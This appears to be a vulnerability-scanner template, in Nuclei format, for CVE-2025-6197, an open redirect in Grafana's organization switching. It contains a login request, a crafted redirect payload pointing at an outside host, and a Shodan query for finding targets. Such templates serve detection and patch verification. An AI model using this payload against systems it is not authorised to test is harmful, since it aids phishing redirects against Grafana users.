An open redirect vulnerability has been identified in Grafana OSS organization switching functionality. Prerequisites for exploitation Multiple organizations must exist in the Grafana instance - Victim must be on a different organization than the one specified in the URL
PoC代码[已公开]
id: CVE-2025-6197
info:
name: Open Redirect via Organization Switching
author: iamnoooob,pdresearch
severity: medium
description: |
An open redirect vulnerability has been identified in Grafana OSS organization switching functionality. Prerequisites for exploitation Multiple organizations must exist in the Grafana instance - Victim must be on a different organization than the one specified in the URL
reference:
- https://grafana.com/blog/2025/07/17/grafana-security-release-medium-and-high-severity-fixes-for-cve-2025-6197-and-cve-2025-6023/
- https://nvd.nist.gov/vuln/detail/CVE-2025-6197
metadata:
verified: true
max-request: 2
shodan-query: html:"grafana"
tags: cve,cve2025,redirect,grafana,open-redirect
variables:
username: "{{username}}"
password: "{{password}}"
orgid: "{{orgid}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
accept: application/json, text/plain, */*
DNT: 1
content-type: application/json
Origin: {{RootURL}}
Referer: {{RootURL}}/login
Cookie: redirect_to=%2F
{"user":"{{username}}","password":"{{password}}"}
extractors:
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Logged in'
- type: word
part: header
words:
- 'grafana_session'
- type: status
status:
- 200
- raw:
- |
GET /%2f%5coast.pro?orgId={{orgid}} HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: dsl
name: open-redirect
dsl:
- status_code == 302
- contains(location, '//\oast.pro?')
condition: and
# digest: 4b0a00483046022100a04708d9dd226ea2b600996ea25617aa4820c81f53f16c9ca5699d9cf7382bbf022100988d23f896135b5222e8a28b11a0bb66e551c283ab44d36e6d3a7734071c8e30:922c64590222798bb761d5b6d8e72950